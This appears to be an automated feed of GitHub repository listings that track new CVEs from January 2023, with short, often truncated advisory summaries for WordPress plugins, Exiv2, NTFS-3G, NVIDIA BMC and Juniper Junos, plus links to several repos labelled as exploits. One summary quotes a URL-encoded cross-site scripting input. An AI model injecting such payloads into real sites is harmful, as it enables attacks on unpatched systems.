**The Mediamatic – Media Library Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change image categories, wh CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0293](https://github.com/Live-Hack-CVE/CVE-2023-0293) create time: 2023-01-13T21:37:42Z

**A vulnerability, which was classified as problematic, has been found in dpup fittr-flickr. This issue affects some unknown processing of the file fittr-flickr/features/easy-exif.js of the component EXIF Preview Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-10002](https://github.com/Live-Hack-CVE/CVE-2009-10002) create time: 2023-01-13T19:26:16Z

**A vulnerability classified as problematic was found in jianlinwei cool-php-captcha up to 0.2. This vulnerability affects unknown code of the file example-form.php. The manipulation of the argument captcha with the input %3Cscript%3Ealert(1)%3C/script%3E leads to cross site scripting. The attack can be initiated remotel CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-10001](https://github.com/Live-Hack-CVE/CVE-2009-10001) create time: 2023-01-13T19:26:12Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic has been found in Th3-822 Rapidleech. This affects the function zip_go of the file classes/options/zip.php. The manipulation of the argument archive leads to cross site scripting. It is possible to initiate the att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4312](https://github.com/Live-Hack-CVE/CVE-2021-4312) create time: 2023-01-13T19:26:20Z

**A crafted NTFS image can cause an out-of-bounds access in ntfs_inode_sync_standard_information in NTFS-3G < 2021.8.22. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39260](https://github.com/Live-Hack-CVE/CVE-2021-39260) create time: 2023-01-13T19:25:58Z

**A crafted NTFS image can cause a heap-based buffer overflow in ntfs_compressed_pwrite in NTFS-3G < 2021.8.22. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39261](https://github.com/Live-Hack-CVE/CVE-2021-39261) create time: 2023-01-13T19:25:54Z

**A crafted NTFS image can trigger an out-of-bounds access, caused by an unsanitized attribute length in ntfs_inode_lookup_by_name, in NTFS-3G < 2021.8.22. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39259](https://github.com/Live-Hack-CVE/CVE-2021-39259) create time: 2023-01-13T19:25:49Z

**A crafted NTFS image can trigger a heap-based buffer overflow, caused by an unsanitized attribute in ntfs_get_attribute_value, in NTFS-3G < 2021.8.22. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39263](https://github.com/Live-Hack-CVE/CVE-2021-39263) create time: 2023-01-13T19:25:45Z

**A crafted NTFS image can cause an out-of-bounds access in ntfs_decompress in NTFS-3G < 2021.8.22. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39262](https://github.com/Live-Hack-CVE/CVE-2021-39262) create time: 2023-01-13T19:25:40Z

**Zoom Rooms for Windows installers before version 5.13.0 contain a local privilege escalation vulnerability. A local low-privileged user could exploit this vulnerability in an attack chain to escalate their privileges to the SYSTEM user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36930](https://github.com/Live-Hack-CVE/CVE-2022-36930) create time: 2023-01-13T19:26:03Z

**Follina(CVE-2022-30190) Vagrant Demo** : [3barz/Follina_Vagrant](https://github.com/3barz/Follina_Vagrant) create time: 2023-01-13T17:32:13Z

**An Invalid memory address dereference was discovered in Exiv2::getULong in types.cpp in Exiv2 0.26. The vulnerability causes a segmentation fault and application crash, which leads to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14864](https://github.com/Live-Hack-CVE/CVE-2017-14864) create time: 2023-01-13T17:14:49Z

**Exiv2 0.26 has a Null Pointer Dereference in the Exiv2::DataValue::toLong function in value.cpp, related to crafted metadata in a TIFF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-18005](https://github.com/Live-Hack-CVE/CVE-2017-18005) create time: 2023-01-13T17:14:44Z

**There is a heap-based buffer over-read in the Exiv2::Internal::PngChunk::keyTXTChunk function of pngchunk_int.cpp in Exiv2 0.26. A crafted PNG file will lead to a remote denial of service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17669](https://github.com/Live-Hack-CVE/CVE-2017-17669) create time: 2023-01-13T17:14:41Z

**There is a Floating point exception in the Exiv2::ValueType function in Exiv2 0.26 that will lead to a remote denial of service attack via crafted input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-11591](https://github.com/Live-Hack-CVE/CVE-2017-11591) create time: 2023-01-13T17:14:36Z

**An Invalid memory address dereference was discovered in Exiv2::DataValue::read in value.cpp in Exiv2 0.26. The vulnerability causes a segmentation fault and application crash, which leads to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14862](https://github.com/Live-Hack-CVE/CVE-2017-14862) create time: 2023-01-13T17:14:32Z

**CiffDirectory::readDirectory() at crwimage_int.cpp in Exiv2 0.26 has excessive stack consumption due to a recursive function, leading to Denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17581](https://github.com/Live-Hack-CVE/CVE-2018-17581) create time: 2023-01-13T17:15:07Z

**In Exiv2 0.26, jpgimage.cpp allows remote attackers to cause a denial of service (image.cpp Exiv2::Internal::stringFormat out-of-bounds read) via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-8976](https://github.com/Live-Hack-CVE/CVE-2018-8976) create time: 2023-01-13T17:15:03Z

**In Exiv2 0.26 and previous versions, PngChunk::readRawProfile in pngchunk_int.cpp may cause a denial of service (application crash due to a heap-based buffer over-read) via a crafted PNG file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19535](https://github.com/Live-Hack-CVE/CVE-2018-19535) create time: 2023-01-13T17:14:59Z

**In Exiv2 0.26, Exiv2::PsdImage::readMetadata in psdimage.cpp in the PSD image reader may suffer from a denial of service (infinite loop) caused by an integer overflow via a crafted PSD image file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19108](https://github.com/Live-Hack-CVE/CVE-2018-19108) create time: 2023-01-13T17:14:54Z

**There is a SEGV in Exiv2::Internal::TiffParserWorker::findPrimaryGroups of tiffimage_int.cpp in Exiv2 0.27-RC3. A crafted input will lead to a remote denial of service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-20097](https://github.com/Live-Hack-CVE/CVE-2018-20097) create time: 2023-01-13T17:14:28Z

**Exiv2::PngImage::readMetadata() in pngimage.cpp in Exiv2 0.27.99.0 allows attackers to cause a denial of service (heap-based buffer over-read) via a crafted image file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14369](https://github.com/Live-Hack-CVE/CVE-2019-14369) create time: 2023-01-13T17:15:25Z

**There is an out-of-bounds read in Exiv2::MrwImage::readMetadata in mrwimage.cpp in Exiv2 through 0.27.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13504](https://github.com/Live-Hack-CVE/CVE-2019-13504) create time: 2023-01-13T17:15:21Z

**Exiv2 0.27.2 allows attackers to trigger a crash in Exiv2::getULong in types.cpp when called from Exiv2::Internal::CiffDirectory::readDirectory in crwimage_int.cpp, because there is no validation of the relationship of the total size to the offset and size. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17402](https://github.com/Live-Hack-CVE/CVE-2019-17402) create time: 2023-01-13T17:15:16Z

**In Exiv2 0.27.99.0, there is an out-of-bounds read in Exiv2::MrwImage::readMetadata() in mrwimage.cpp. It could result in denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14370](https://github.com/Live-Hack-CVE/CVE-2019-14370) create time: 2023-01-13T17:15:12Z

**a12nserver is an open source lightweight OAuth2 server. Users of a12nserver that use MySQL might be vulnerable to SQL injection bugs. If you use a12nserver and MySQL, update as soon as possible. This SQL injection bug might let an attacker obtain OAuth2 Access Tokens for users unrelated to those that permitted OAuth2 c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22494](https://github.com/Live-Hack-CVE/CVE-2023-22494) create time: 2023-01-13T17:15:44Z

**Cross-site Scripting (XSS) - Stored in GitHub repository craigk5n/webcalendar prior to master. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0289](https://github.com/Live-Hack-CVE/CVE-2023-0289) create time: 2023-01-13T17:15:39Z

**Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1189. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0288](https://github.com/Live-Hack-CVE/CVE-2023-0288) create time: 2023-01-13T17:15:35Z

**Product security bypass vulnerability in ACC prior to version 8.3.4 allows a locally logged-in attacker with administrator privileges to bypass the execution controls provided by ACC using the utilman program. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0221](https://github.com/Live-Hack-CVE/CVE-2023-0221) create time: 2023-01-13T17:15:30Z

**A vulnerability classified as critical has been found in Modern Tribe Panel Builder Plugin. Affected is the function add_post_content_filtered_to_search_sql of the file ModularContent/SearchFilter.php. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36626](https://github.com/Live-Hack-CVE/CVE-2020-36626) create time: 2023-01-13T16:07:44Z

**Lead Management System v1.0 is vulnerable to SQL Injection via the id parameter in removeProduct.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47860](https://github.com/Live-Hack-CVE/CVE-2022-47860) create time: 2023-01-13T16:08:13Z

**Lead Management System v1.0 is vulnerable to SQL Injection via the user_id parameter in changePassword.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47859](https://github.com/Live-Hack-CVE/CVE-2022-47859) create time: 2023-01-13T16:08:08Z

**Lead Management System v1.0 is vulnerable to SQL Injection via the id parameter in removeCategories.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47864](https://github.com/Live-Hack-CVE/CVE-2022-47864) create time: 2023-01-13T16:08:03Z

**Lead Management System v1.0 is vulnerable to SQL Injection via the customer_id parameter in ajax_represent.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47862](https://github.com/Live-Hack-CVE/CVE-2022-47862) create time: 2023-01-13T16:07:57Z

**Lead Management System v1.0 is vulnerable to SQL Injection via the id parameter in removeLead.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47861](https://github.com/Live-Hack-CVE/CVE-2022-47861) create time: 2023-01-13T16:07:52Z

**Spitfire CMS 1.0.475 is vulnerable to PHP Object Injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47083](https://github.com/Live-Hack-CVE/CVE-2022-47083) create time: 2023-01-13T16:07:40Z

**[CVE-2022-41828] Amazon AWS Redshift JDBC Driver Remote Code Execution (RCE)** : [murataydemir/CVE-2022-41828](https://github.com/murataydemir/CVE-2022-41828) create time: 2022-12-09T10:35:33Z

**CVE 2022-45299** : [offalltn/CVE-2022-45299](https://github.com/offalltn/CVE-2022-45299) create time: 2023-01-13T11:47:02Z

**The Royal Elementor Addons plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.3.59, due to due to insufficient input sanitization and output escaping of the 'wpr_ajax_search_link_target' parameter in the 'data_fetch' function. This makes it possible for unauthentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4710](https://github.com/Live-Hack-CVE/CVE-2022-4710) create time: 2023-01-13T11:41:46Z

**The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_import_library_template' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to import and activate templates from the plugin' CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4709](https://github.com/Live-Hack-CVE/CVE-2022-4709) create time: 2023-01-13T11:41:42Z

**The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_save_template_conditions' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to modify the conditions under which templates a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4708](https://github.com/Live-Hack-CVE/CVE-2022-4708) create time: 2023-01-13T11:41:37Z

**The Royal Elementor Addons plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.59. This is due to missing nonce validation in the 'wpr_create_mega_menu_template' AJAX function. This allows unauthenticated attackers to create Mega Menu templates, granted they can trick CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4707](https://github.com/Live-Hack-CVE/CVE-2022-4707) create time: 2023-01-13T11:41:33Z

**The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_import_templates_kit' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to import preset site configuration templates includ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4704](https://github.com/Live-Hack-CVE/CVE-2022-4704) create time: 2023-01-13T11:41:28Z

**The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_final_settings_setup' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to finalize activation of preset site configuration CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4705](https://github.com/Live-Hack-CVE/CVE-2022-4705) create time: 2023-01-13T11:41:24Z

**The File Management System developed by FileOrbis before version 10.6.3 has an unauthenticated local file inclusion and path traversal vulnerability. This has been fixed in the version 10.6.3 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3693](https://github.com/Live-Hack-CVE/CVE-2022-3693) create time: 2023-01-13T11:41:20Z

**A vulnerability classified as critical has been found in SourceCodester Online Flight Booking Management System. This affects an unknown part of the file review_search.php of the component POST Parameter Handler. The manipulation of the argument txtsearch leads to sql injection. It is possible to initiate the attack re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0283](https://github.com/Live-Hack-CVE/CVE-2023-0283) create time: 2023-01-13T11:40:59Z

**A vulnerability was found in SourceCodester Online Flight Booking Management System. It has been rated as critical. Affected by this issue is some unknown functionality of the file judge_panel.php. The manipulation of the argument subevent_id leads to sql injection. The attack may be launched remotely. The exploit has CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0281](https://github.com/Live-Hack-CVE/CVE-2023-0281) create time: 2023-01-13T11:40:55Z

**Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 106.0.5249.62 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)** : [hfh86/CVE-2022-3317](https://github.com/hfh86/CVE-2022-3317) create time: 2023-01-13T08:06:54Z

**Online Student Enrollment System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at /student_enrollment/admin/login.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46502](https://github.com/Live-Hack-CVE/CVE-2022-46502) create time: 2023-01-13T06:14:59Z

**DGX A100 SBIOS contains a vulnerability in the Pre-EFI Initialization (PEI)phase, where a privileged user can disable SPI flash protection, which may lead to denial of service, escalation of privileges, or data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42285](https://github.com/Live-Hack-CVE/CVE-2022-42285) create time: 2023-01-13T06:14:55Z

**NVIDIA BMC stores user passwords in an obfuscated form in a database accessible by the host. This may lead to a credentials exposure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42284](https://github.com/Live-Hack-CVE/CVE-2022-42284) create time: 2023-01-13T06:14:51Z

**NVIDIA BMC contains a vulnerability in IPMI handler, where an authorized attacker can cause a buffer overflow and cause a denial of service or gain code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42283](https://github.com/Live-Hack-CVE/CVE-2022-42283) create time: 2023-01-13T06:14:48Z

**NVIDIA BMC contains a vulnerability in SPX REST API, where an authorized attacker can access arbitrary files, which may lead to information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42282](https://github.com/Live-Hack-CVE/CVE-2022-42282) create time: 2023-01-13T06:14:44Z

**NVIDIA DGX A100 contains a vulnerability in SBIOS in the FsRecovery, which may allow a highly privileged local attacker to cause an out-of-bounds write, which may lead to code execution, denial of service, compromised integrity, and information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42281](https://github.com/Live-Hack-CVE/CVE-2022-42281) create time: 2023-01-13T06:14:40Z

**NVIDIA BMC contains a vulnerability in SPX REST auth handler, where an un-authorized attacker can exploit a path traversal, which may lead to authentication bypass. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42280](https://github.com/Live-Hack-CVE/CVE-2022-42280) create time: 2023-01-13T06:14:36Z

**NVIDIA BMC contains a vulnerability in SPX REST API, where an authorized attacker can inject arbitrary shell commands, which may lead to code execution, denial of service, information disclosure and data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42279](https://github.com/Live-Hack-CVE/CVE-2022-42279) create time: 2023-01-13T06:14:32Z

**NVIDIA BMC contains a vulnerability in SPX REST API, where an authorized attacker can read and write to arbitrary locations within the memory context of the IPMI server process, which may lead to code execution, denial of service, information disclosure and data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42278](https://github.com/Live-Hack-CVE/CVE-2022-42278) create time: 2023-01-13T06:14:28Z

**NVIDIA DGX Station contains a vulnerability in SBIOS in the SmiFlash, where a local user with elevated privileges can read, write and erase flash, which may lead to code execution, escalation of privileges, denial of service, and information disclosure. The scope of impact can extend to other components. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42277](https://github.com/Live-Hack-CVE/CVE-2022-42277) create time: 2023-01-13T06:14:24Z

**NVIDIA DGX A100 contains a vulnerability in SBIOS in the SmiFlash, where a local user with elevated privileges can read, write and erase flash, which may lead to code execution, escalation of privileges, denial of service, and information disclosure. The scope of impact can extend to other components. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42276](https://github.com/Live-Hack-CVE/CVE-2022-42276) create time: 2023-01-13T06:14:20Z

**In Eternal Terminal 6.2.1, etserver and etclient have world-readable logfiles. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48258](https://github.com/Live-Hack-CVE/CVE-2022-48258) create time: 2023-01-13T06:14:12Z

**In Eternal Terminal 6.2.1, etserver and etclient have predictable logfile names in /tmp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48257](https://github.com/Live-Hack-CVE/CVE-2022-48257) create time: 2023-01-13T06:14:08Z

**Technitium DNS Server before 10.0 allows a self-CNAME denial-of-service attack in which a CNAME loop causes an answer to contain hundreds of records. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48256](https://github.com/Live-Hack-CVE/CVE-2022-48256) create time: 2023-01-13T06:14:04Z

**The RPC interface in datax-web v1.0.0 and v2.0.0 to v2.1.2 contains no permission checks by default which allows attackers to execute arbitrary commands via crafted Hessian serialized data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46478](https://github.com/Live-Hack-CVE/CVE-2022-46478) create time: 2023-01-13T06:14:00Z

**Online Health Care System v1.0 was discovered to contain a SQL injection vulnerability via the consulting_id parameter at /healthcare/Admin/consulting_detail.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46471](https://github.com/Live-Hack-CVE/CVE-2022-46471) create time: 2023-01-13T06:13:57Z

**NVIDIA BMC IPMI handler allows an unauthenticated host to write to a host SPI flash bypassing secureboot protections. This may lead to a loss of integrity and denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42275](https://github.com/Live-Hack-CVE/CVE-2022-42275) create time: 2023-01-13T06:13:53Z

**NVIDIA BMC contains a vulnerability in IPMI handler, where an authorized attacker can cause a buffer overflow and cause a denial of service or gain code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42274](https://github.com/Live-Hack-CVE/CVE-2022-42274) create time: 2023-01-13T06:13:49Z

**The APDFL.dll contains a memory corruption vulnerability while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3161](https://github.com/Live-Hack-CVE/CVE-2022-3161) create time: 2023-01-13T06:13:45Z

**The APDFL.dll contains an out-of-bounds write past the fixed-length heap-based buffer while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3160](https://github.com/Live-Hack-CVE/CVE-2022-3160) create time: 2023-01-13T06:13:42Z

**The APDFL.dll contains a stack-based buffer overflow vulnerability that could be triggered while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3159](https://github.com/Live-Hack-CVE/CVE-2022-3159) create time: 2023-01-13T06:13:38Z

**Versions of the package global-modules-path before 3.0.0 are vulnerable to Command Injection due to missing input sanitization or other checks and sandboxes being employed to the getPath function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21191](https://github.com/Live-Hack-CVE/CVE-2022-21191) create time: 2023-01-13T06:13:26Z

**Exploit to CVE-2022-46169 vulnerability** : [Anthonyc3rb3ru5/CVE-2022-46169](https://github.com/Anthonyc3rb3ru5/CVE-2022-46169) create time: 2023-01-13T05:37:56Z

**In rndis_query_oid in drivers/net/wireless/rndis_wlan.c in the Linux kernel through 6.1.5, there is an integer overflow in an addition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23559](https://github.com/Live-Hack-CVE/CVE-2023-23559) create time: 2023-01-13T06:14:16Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0237](https://github.com/Live-Hack-CVE/CVE-2023-0237) create time: 2023-01-13T06:13:34Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0235](https://github.com/Live-Hack-CVE/CVE-2023-0235) create time: 2023-01-13T06:13:30Z

**no description** : [momika233/CVE-2022-3656](https://github.com/momika233/CVE-2022-3656) create time: 2023-01-13T03:26:14Z

**MatrixSSL session resume bug** : [SmallTown123/details-for-CVE-2022-46505](https://github.com/SmallTown123/details-for-CVE-2022-46505) create time: 2023-01-13T03:07:52Z

**MatrixSSL session resume bug** : [SmallTown123/Details-for-CVE-2022-46505](https://github.com/SmallTown123/Details-for-CVE-2022-46505) create time: 2023-01-13T02:39:50Z

**Delta Electronics InfraSuite Device Master versions 00.00.01a and prior deserialize user-supplied data provided through the Device-DataCollect service port without proper verification. An attacker could provide malicious serialized objects to execute arbitrary code upon deserialization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41778](https://github.com/Live-Hack-CVE/CVE-2022-41778) create time: 2023-01-13T01:45:06Z

**Memory corruption in display driver due to incorrect type casting while accessing the fence structure fields CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25715](https://github.com/Live-Hack-CVE/CVE-2022-25715) create time: 2023-01-13T01:45:02Z

**A Missing Release of Memory after Effective Lifetime vulnerability in the Flow Processing Daemon (flowd) of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). In an IPsec VPN environment, a memory leak will be seen if a DH or ECDH group is configured. Eventual CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22417](https://github.com/Live-Hack-CVE/CVE-2023-22417) create time: 2023-01-13T01:46:35Z

**A Buffer Overflow vulnerability in SIP ALG of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). On all MX Series and SRX Series platform with SIP ALG enabled, when a malformed SIP packet is received, the flow processing daemon (flowd) will crash and restart. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22416](https://github.com/Live-Hack-CVE/CVE-2023-22416) create time: 2023-01-13T01:46:30Z

**An Out-of-Bounds Write vulnerability in the H.323 ALG of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause Denial of Service (DoS). On all MX Series and SRX Series platform, when H.323 ALG is enabled and specific H.323 packets are received simultaneously, a flow processing daemon (flo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22415](https://github.com/Live-Hack-CVE/CVE-2023-22415) create time: 2023-01-13T01:46:26Z

**A Missing Release of Memory after Effective Lifetime vulnerability in Flexible PIC Concentrator (FPC) of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker from the same shared physical or logical network, to cause a heap memory leak and leading to FPC crash. On all Junos PTX Series and QFX10000 Ser CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22414](https://github.com/Live-Hack-CVE/CVE-2023-22414) create time: 2023-01-13T01:46:22Z

**An Improper Check or Handling of Exceptional Conditions vulnerability in the IPsec library of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause Denial of Service (DoS). On all MX platforms with MS-MPC or MS-MIC card, when specific IPv4 packets are processed by an IPsec6 tunnel, the Mul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22413](https://github.com/Live-Hack-CVE/CVE-2023-22413) create time: 2023-01-13T01:46:18Z

**An Improper Locking vulnerability in the SIP ALG of Juniper Networks Junos OS on MX Series with MS-MPC or MS-MIC card and SRX Series allows an unauthenticated, network-based attacker to cause a flow processing daemon (flowd) crash and thereby a Denial of Service (DoS). Continued receipt of these specific packets will c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22412](https://github.com/Live-Hack-CVE/CVE-2023-22412) create time: 2023-01-13T01:46:14Z

**An Out-of-Bounds Write vulnerability in Flow Processing Daemon (flowd) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause Denial of Service (DoS). On SRX Series devices using Unified Policies with IPv6, when a specific IPv6 packet goes through a dynamic-application filter which will CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22411](https://github.com/Live-Hack-CVE/CVE-2023-22411) create time: 2023-01-13T01:46:09Z

**A Missing Release of Memory after Effective Lifetime vulnerability in the Juniper Networks Junos OS on MX Series platforms with MPC10/MPC11 line cards, allows an unauthenticated adjacent attacker to cause a Denial of Service (DoS). Devices are only vulnerable when the Suspicious Control Flow Detection (scfd) feature is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22410](https://github.com/Live-Hack-CVE/CVE-2023-22410) create time: 2023-01-13T01:46:05Z

**An Unchecked Input for Loop Condition vulnerability in a NAT library of Juniper Networks Junos OS allows a local authenticated attacker with low privileges to cause a Denial of Service (DoS). When an inconsistent "deterministic NAT" configuration is present on an SRX, or MX with SPC3 and then a specific CLI command is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22409](https://github.com/Live-Hack-CVE/CVE-2023-22409) create time: 2023-01-13T01:46:01Z

**An Improper Validation of Array Index vulnerability in the SIP ALG of Juniper Networks Junos OS on SRX 5000 Series allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). When an attacker sends an SIP packets with a malformed SDP field then the SIP ALG can not process it which will lead to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22408](https://github.com/Live-Hack-CVE/CVE-2023-22408) create time: 2023-01-13T01:45:57Z

**An Incomplete Cleanup vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). An rpd crash can occur when an MPLS TE tunnel configuration change occurs on a directly connected router. This issue CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22407](https://github.com/Live-Hack-CVE/CVE-2023-22407) create time: 2023-01-13T01:45:54Z

**A Missing Release of Memory after Effective Lifetime vulnerability in the kernel of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). In a segment-routing scenario with OSPF as IGP, when a peer interface continuously flaps, next-hop churn wil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22406](https://github.com/Live-Hack-CVE/CVE-2023-22406) create time: 2023-01-13T01:45:49Z

**An Improper Preservation of Consistency Between Independent Representations of Shared State vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS) to device due to out of resources. When a device is configured with CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22405](https://github.com/Live-Hack-CVE/CVE-2023-22405) create time: 2023-01-13T01:45:45Z

**An Out-of-bounds Write vulnerability in the Internet Key Exchange Protocol daemon (iked) of Juniper Networks Junos OS on SRX series and MX with SPC3 allows an authenticated, network-based attacker to cause a Denial of Service (DoS). iked will crash and restart, and the tunnel will not come up when a peer sends a specif CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22404](https://github.com/Live-Hack-CVE/CVE-2023-22404) create time: 2023-01-13T01:45:41Z

**An Allocation of Resources Without Limits or Throttling vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). On QFX10k Series Inter-Chassis Control Protocol (ICCP) is used in MC-LAG topologies to exchange co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22403](https://github.com/Live-Hack-CVE/CVE-2023-22403) create time: 2023-01-13T01:45:37Z

